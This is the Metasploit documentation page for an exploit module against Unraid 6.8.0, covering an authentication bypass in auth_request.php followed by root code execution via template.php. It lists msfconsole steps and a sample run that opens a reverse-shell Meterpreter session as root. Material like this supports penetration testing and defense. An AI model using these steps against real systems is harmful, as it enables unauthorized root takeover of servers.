metasploit-gs/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md at bc46159a01b52527fa4480128fe4a22ca05589d0

Files

T

Nicolas Chatelain 58780c6db9 Update Unraid 6.8.0 exploit module

- Changed exploit name
- Set Privileged to true
- Better error handling
- Typo fixes

2020-03-21 11:44:35 +01:00

1.6 KiB

Raw Blame History

Vulnerable Application

This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.

Description

This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in auth_request.php and then performs remote code execution as root by abusing the extract function used in the template.php file.

Testing Environment

Setup Unraid 6.8.0 according to the UnRAID Getting Started guide.

Verification Steps

Setup UnRAID 6.8.0
Start msfconsole
use exploit/linux/http/unraid_auth_bypass_exec
set RHOST [UNRAID]
check
run
You should get a new root session

Options

TARGETURI : The URI of the Unraid application

Scenarios

msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
RHOSTS => 10.10.0.173
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
[*] 10.10.0.173:80 - The target appears to be vulnerable.
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run

[*] Started reverse TCP handler on 10.10.0.161:4444 
[*] Sending stage (38288 bytes) to 10.10.0.173
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
[+] Request timed out, OK if running a non-forking/blocking payload...

meterpreter > getuid
Server username: root (0)

1.6 KiB Raw Blame History